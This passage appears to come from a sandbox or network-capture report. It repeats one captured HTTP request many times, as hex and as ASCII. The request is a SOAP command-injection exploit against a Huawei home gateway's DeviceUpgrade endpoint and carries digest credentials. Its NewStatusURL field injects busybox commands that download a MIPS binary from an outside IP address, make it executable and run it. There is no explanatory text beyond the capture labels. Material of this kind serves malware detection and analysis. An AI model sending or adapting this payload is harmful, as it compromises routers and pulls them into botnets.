73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
